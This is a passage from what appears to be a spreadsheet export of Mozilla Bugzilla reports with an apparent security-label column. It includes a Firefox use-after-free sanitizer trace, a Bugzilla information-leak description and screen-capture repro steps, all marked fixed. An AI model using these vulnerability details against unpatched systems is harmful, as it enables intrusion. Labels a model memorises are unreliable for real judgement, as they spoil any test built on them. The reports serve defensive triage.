    #37 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #38 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #39 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #40 0x7fd00d26f4ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7fd010a75997 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:852:12
    #42 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #43 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #44 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #45 0x7fd010a7547c in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:684:7
    #46 0x4e00c6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #47 0x4e00c6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #48 0x7fd02245782f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #49 0x41c2e8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c2e8)
0x6250003dd140 is located 6208 bytes inside of 8192-byte region [0x6250003db900,0x6250003dd900)
freed by thread T0 (Web Content) here:
    #0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fd01fa35117 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7fd01fa35117 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7fd00d935eef in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7fd00d9af120 in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:181:7
    #5 0x7fd00d9af2cd in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:898:1
    #6 0x7fd00d9aacf4 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:892:1
    #7 0x7fd00daac005 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:334:7
    #8 0x7fd00daac005 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:600
    #9 0x7fd00daac005 in nsDocumentViewer::DestroyPresShell() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4586
    #10 0x7fd00da9b1bf in nsDocumentViewer::Destroy() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1715:5
    #11 0x7fd00daae0cd in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2047:5
    #12 0x7fd00db38eaf in nsPresContext::EnsureVisible() /home/worker/workspace/build/src/layout/base/nsPresContext.cpp:2159:27
    #13 0x7fd00d9cc1da in mozilla::PresShell::UnsuppressAndInvalidate() /home/worker/workspace/build/src/layout/base/PresShell.cpp:3901:40
    #14 0x7fd00daa3c8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1078:7
    #15 0x7fd00ff64422 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7628:5
    #16 0x7fd00ff60214 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
    #17 0x7fd00ff67a9f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13
    #18 0x7fd008a838e0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1256:3
    #19 0x7fd008a82878 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:841:5
    #20 0x7fd008a7f5d6 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:731:9
    #21 0x7fd008a816d4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:613:5
    #22 0x7fd008a8228c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:469:14
    #23 0x7fd00726969b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #24 0x7fd009ad1ffb in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8832:7
    #25 0x7fd009ad1b9b in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8758:9
    #26 0x7fd009aa7cfc in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5280:3
    #27 0x7fd009b821a2 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #28 0x7fd009b821a2 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #29 0x7fd009b821a2 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #30 0x7fd0070809d2 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:242:21
    #31 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #32 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #33 0x7fd007ec6acf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #34 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #35 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #36 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
previously allocated by thread T0 (Web Content) here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7fd01fa34a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7fd00d936731 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7fd00d84ab7e in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7fd00d84ab7e in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
    #5 0x7fd00d84ab7e in operator new /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:2803
    #6 0x7fd00d84ab7e in nsRuleNode::ComputeDisplayData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:5544
    #7 0x7fd00d8292f1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2638:10
    #8 0x7fd00905afd7 in nsStyleDisplay const* nsRuleNode::GetStyleDisplay&lt;true&gt;(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleStructList.h:98:1
    #9 0x7fd00d898413 in DoGetStyleDisplay&lt;true&gt; /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:98:1
    #10 0x7fd00d898413 in StyleDisplay /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:98
    #11 0x7fd00d898413 in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:716
    #12 0x7fd00d897cc6 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
    #13 0x7fd00d897cc6 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed&lt;nsRuleNode&gt;, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
    #14 0x7fd00d8a6989 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
    #15 0x7fd00d8c88ff in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
    #16 0x7fd00d8cd849 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
    #17 0x7fd00d8cd300 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #18 0x7fd00da5ec67 in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:135:12
    #19 0x7fd00da5ec67 in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:94
    #20 0x7fd00da5ec67 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5037
    #21 0x7fd00da61ed0 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5006:10
    #22 0x7fd00da61ed0 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5022
    #23 0x7fd00da61ed0 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5654
    #24 0x7fd00da458e6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10873:9
    #25 0x7fd00da59c97 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4061:9
    #26 0x7fd00da64986 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6189:3
    #27 0x7fd00da4ff55 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10685:5
    #28 0x7fd00da4ff55 in nsCSSFrameConstructor::BeginBuildingScrollFrame(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, nsIAtom*, bool, nsContainerFrame*&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4572
    #29 0x7fd00da4ca7b in nsCSSFrameConstructor::SetUpDocElementContainingBlock(nsIContent*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2904:25
    #30 0x7fd00da4903c in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2416:3
    #31 0x7fd00da6d959 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7773:7
    #32 0x7fd00d9b5282 in mozilla::PresShell::Initialize(int, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:1810:7
    #33 0x7fd009a0d161 in nsContentSink::StartLayout(bool) /home/worker/workspace/build/src/dom/base/nsContentSink.cpp:1237:19
    #34 0x7fd008c5c446 in nsHtml5TreeOpExecutor::StartLayout() /home/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:622:3
    #35 0x7fd008c686d9 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) /home/worker/workspace/build/src/parser/html/nsHtml5TreeOperation.cpp:998:7
    #36 0x7fd008c59bd1 in nsHtml5TreeOpExecutor::RunFlushLoop() /home/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:457:21
    #37 0x7fd008c5e94b in nsHtml5ExecutorFlusher::Run() /home/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #38 0x7fd0070809d2 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:242:21
    #39 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #40 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:343:10 in RemoveChild
Shadow bytes around the buggy address:
  0x0c4a800739d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800739e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800739f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c4a80073a20: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c4a80073a30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a7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4376==ABORTING</t>
        </is>
      </c>
      <c r="X3292" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3293">
      <c r="A3293" t="n">
        <v>824399</v>
      </c>
      <c r="B3293" t="inlineStr">
        <is>
          <t>2012-12-23 17:01:00 -0800</t>
        </is>
      </c>
      <c r="C3293" t="inlineStr">
        <is>
          <t>[SECURITY] build_subselect() leaks the existence of products and components you cannot access</t>
        </is>
      </c>
      <c r="D3293" t="inlineStr">
        <is>
          <t>2014-08-14 07:59:28 -0700</t>
        </is>
      </c>
      <c r="E3293" t="n">
        <v>1</v>
      </c>
      <c r="F3293" t="n">
        <v>1</v>
      </c>
      <c r="G3293" t="n">
        <v>4</v>
      </c>
      <c r="H3293" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3293" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3293" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K3293" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L3293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3293" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3293" t="inlineStr">
        <is>
          <t>[doesn't affect the 4.2 branch]</t>
        </is>
      </c>
      <c r="Q3293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3293" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3293" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T3293" t="n">
        <v>1</v>
      </c>
      <c r="U3293" t="n">
        <v>0</v>
      </c>
      <c r="V3293" t="n">
        <v>39</v>
      </c>
      <c r="W3293" t="inlineStr">
        <is>
          <t>In Bugzilla 2.17.1 (bug 179960), Bugzilla::Search::build_subselect() was introduced to improve performance when querying products and components. Its job is to run the subselect itself and return the corresponding product/component IDs. But by doing this, it leaks the existence of products and components you cannot see.
If you try to directly access a product you cannot see, Bugzilla will throw an error of the form "either this product doesn't exist, or you don't have access to it". This means you have no way to know if this product exists, as expected. But when running queries, build_subselect() will return 1=2 if the product doesn't exist at all, else it will return the product ID. So you can use this trick to determine if a product doesn't exist at all, or exists but you are not allowed to access it.
Bugzilla 2.17.1 to 4.0.x are affected (due to bug 179960), then 4.1.1 to 4.4rc1 are not affected (due to bug 579568), and 4.4rc1+ to 4.5 are affected again (due to bug 780820). As we didn't release 4.4rc2 or 4.5.1 yet, only the 3.6.x and 4.0.x releases are affected by this issue.
There is a clear performance by running the subselects in build_subselect() itself and returning the IDs only, so we certainly don't want to revert that. So I have no idea how to fix this issue. The only way would be to disable the debug mode entirely, but that's too useful to be disabled.</t>
        </is>
      </c>
      <c r="X3293" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3294">
      <c r="A3294" t="n">
        <v>420697</v>
      </c>
      <c r="B3294" t="inlineStr">
        <is>
          <t>2008-03-03 04:59:28 -0800</t>
        </is>
      </c>
      <c r="C3294" t="inlineStr">
        <is>
          <t>Crash [@ nsAttributeTextNode::~nsAttributeTextNode()] with text and stroke-dasharray and stroke-dashoffset</t>
        </is>
      </c>
      <c r="D3294" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E3294" t="n">
        <v>1</v>
      </c>
      <c r="F3294" t="n">
        <v>1</v>
      </c>
      <c r="G3294" t="n">
        <v>3</v>
      </c>
      <c r="H3294" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3294" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3294" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K3294" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3294" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3294" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3294" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3294" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q3294" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3294" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3294" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3294" t="n">
        <v>1</v>
      </c>
      <c r="U3294" t="n">
        <v>0</v>
      </c>
      <c r="V3294" t="n">
        <v>26</v>
      </c>
      <c r="W3294" t="inlineStr">
        <is>
          <t>Created attachment 307023
testcase 1: crashes in GetStrokeDashoffset (pre-patch)
See testcase, which crashes in current trunk build.
http://crash-stats.mozilla.com/report/index/c0f94933-e920-11dc-93d3-001a4bd43e5c
0  	nsAttributeTextNode::~nsAttributeTextNode()  	 mozilla/content/base/src/nsTextNode.cpp:103
1 	xul.dll@0x7e3c07 	
2 	nsSVGLength::MaybeGetCtxRect() 	mozilla/content/svg/content/src/nsSVGLength.cpp:597
3 	nsSVGLength::MaybeAddAsObserver() 	mozilla/content/svg/content/src/nsSVGLength.cpp:608
4 	nsSVGLength::SetContext(nsIWeakReference*, unsigned char) 	mozilla/content/svg/content/src/nsSVGLength.cpp:515
5 	nsSVGUtils::CoordToFloat(nsPresContext*, nsSVGElement*, nsStyleCoord const&amp;) 	mozilla/layout/svg/base/src/nsSVGUtils.cpp:668
6 	nsSVGGeometryFrame::GetStrokeDashoffset() 	mozilla/layout/svg/base/src/nsSVGGeometryFrame.cpp:238
7 	nsSVGGeometryFrame::SetupCairoStroke(gfxContext*) 	mozilla/layout/svg/base/src/nsSVGGeometryFrame.cpp:421</t>
        </is>
      </c>
      <c r="X3294" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3295">
      <c r="A3295" t="n">
        <v>1642747</v>
      </c>
      <c r="B3295" t="inlineStr">
        <is>
          <t>2020-06-02 12:39:50 -0700</t>
        </is>
      </c>
      <c r="C3295" t="inlineStr">
        <is>
          <t>It's possible to screen-capture the next tab after tab close</t>
        </is>
      </c>
      <c r="D3295" t="inlineStr">
        <is>
          <t>2022-05-14 19:18:32 -0700</t>
        </is>
      </c>
      <c r="E3295" t="n">
        <v>1</v>
      </c>
      <c r="F3295" t="n">
        <v>1</v>
      </c>
      <c r="G3295" t="n">
        <v>2</v>
      </c>
      <c r="H3295" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3295" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3295" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K3295" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3295" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3295" t="inlineStr">
        <is>
          <t>[adv-main85+]</t>
        </is>
      </c>
      <c r="Q3295" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3295" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3295" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T3295" t="n">
        <v>1</v>
      </c>
      <c r="U3295" t="n">
        <v>0</v>
      </c>
      <c r="V3295" t="n">
        <v>17</v>
      </c>
      <c r="W3295" t="inlineStr">
        <is>
          <t>From bug 1641802 comment 4, when screen-capturing the Firefox window (or the "Entire screen" with Firefox on it), JS may capture a split second ***after*** tab close, capturing the next tab shown. This is not POLA, and could be exploited to put users' privacy at risk.
STRs:
 1. Open a random victim tab, e.g. https://gokitty.com
 2. Open https://fiddle.jshell.net/jib1/0sjrmkuh/show
 3. Click the `Capture screen!` button, and select the Firefox window (or Entire Desktop) + Allow
 4. Close the fiddle tab.
 5. Re-open the fiddle tab.
Expected result:
* A screen-grab of the fiddle tab
Actual result:
* A screen-grab of gokitty.com
I've tried it on both Windows 10 and macOS 10.15.4. My success-rate is about 1/5 times.
Similarly, I've tried sending the capture to another tab over WebRTC (open [this](https://jsfiddle.net/jib1/w3L7ujpo/) in two tabs), but not had success reproing that way. Although, this being timing-related, we perhaps shouldn't rule it out.
The repro fiddle doesn't work in release for some reason (`uncaught exception: Object`), it's unclear why. But this weakness is most likely not a regression, and an exploit that works in release could presumably be written.</t>
        </is>
      </c>
      <c r="X3295" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3296">
      <c r="A3296" t="n">
        <v>494368</v>
      </c>
      <c r="B3296" t="inlineStr">
        <is>
          <t>2009-05-22 04:55:22 -0700</t>
        </is>
      </c>
      <c r="C3296" t="inlineStr">
        <is>
          <t>Status bar should have a decent default theme on all major OS's</t>
        </is>
      </c>
      <c r="D3296" t="inlineStr">
        <is>
          <t>2009-08-20 00:45:32 -0700</t>
        </is>
      </c>
      <c r="E3296" t="n">
        <v>1</v>
      </c>
      <c r="F3296" t="n">
        <v>1</v>
      </c>
      <c r="G3296" t="n">
        <v>6</v>
      </c>
      <c r="H3296" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3296" t="inlineStr">
        <is>
          <t>Mozilla Labs</t>
        </is>
      </c>
      <c r="J3296" t="inlineStr">
        <is>
          <t>Jetpack Prototype</t>
        </is>
      </c>
      <c r="K3296" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3296" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3296" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3296" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3296" t="inlineStr"/>
      <c r="Q3296" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3296" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T3296" t="n">
        <v>0</v>
      </c>
      <c r="U3296" t="n">
        <v>0</v>
      </c>
      <c r="V3296" t="n">
        <v>3</v>
      </c>
      <c r="W3296" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2a1pre) Gecko/20090521 Minefield/3.6a1pre
Build Identifier: 0.1.2
As described in source files (status-bar-panel.js:75) background of statusbar isn't being correctly shown. 
      // Due to the fixing of bug 449442, it's very hard for us to
      // copy the background of the status bar on OS X, but here's
      // a shot.
      // TODO: We may also want to try applying this bg to the
      // entire statusbar.
      // This file used to be at
      // chrome://global/skin/statusbar-background.gif, but was
      // removed when 449442 was fixed.
Reproducible: Always
Actual Results:  
Arbitary gradient is shown
Expected Results:  
Transparant iframes or same background as visible below</t>
        </is>
      </c>
      <c r="X3296" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3297">
      <c r="A3297" t="n">
        <v>192207</v>
      </c>
      <c r="B3297" t="inlineStr">
        <is>
          <t>2003-02-06 23:28:45 -0800</t>
        </is>
      </c>
      <c r="C3297" t="inlineStr">
        <is>
          <t>M130B Trunk crash [@ 0x00000000 - PL_DHashTableOperate] (really in nsSocketTransportService::RememberHost)</t>
        </is>
      </c>
      <c r="D3297" t="inlineStr">
        <is>
          <t>2003-02-28 01:29:39 -0800</t>
        </is>
      </c>
      <c r="E3297" t="n">
        <v>1</v>
      </c>
      <c r="F3297" t="n">
        <v>1</v>
      </c>
      <c r="G3297" t="n">
        <v>3</v>
      </c>
      <c r="H3297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3297" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3297" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3297" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3297" t="inlineStr">
        <is>
          <t>fixed1.3</t>
        </is>
      </c>
      <c r="Q3297" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3297" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3297" t="inlineStr">
        <is>
          <t>mozilla1.3final</t>
        </is>
      </c>
      <c r="T3297" t="n">
        <v>1</v>
      </c>
      <c r="U3297" t="n">
        <v>0</v>
      </c>
      <c r="V3297" t="n">
        <v>36</v>
      </c>
      <c r="W3297" t="inlineStr">
        <is>
          <t>topcrash @nsSocketTransportService::RememberHost
0x00000000
PL_DHashTableOperate [xpcom/ds/pldhash.c line 480]
nsSocketTransportService::RememberHost
[netwerk/base/src/nsSocketTransportService2.cpp line 294]
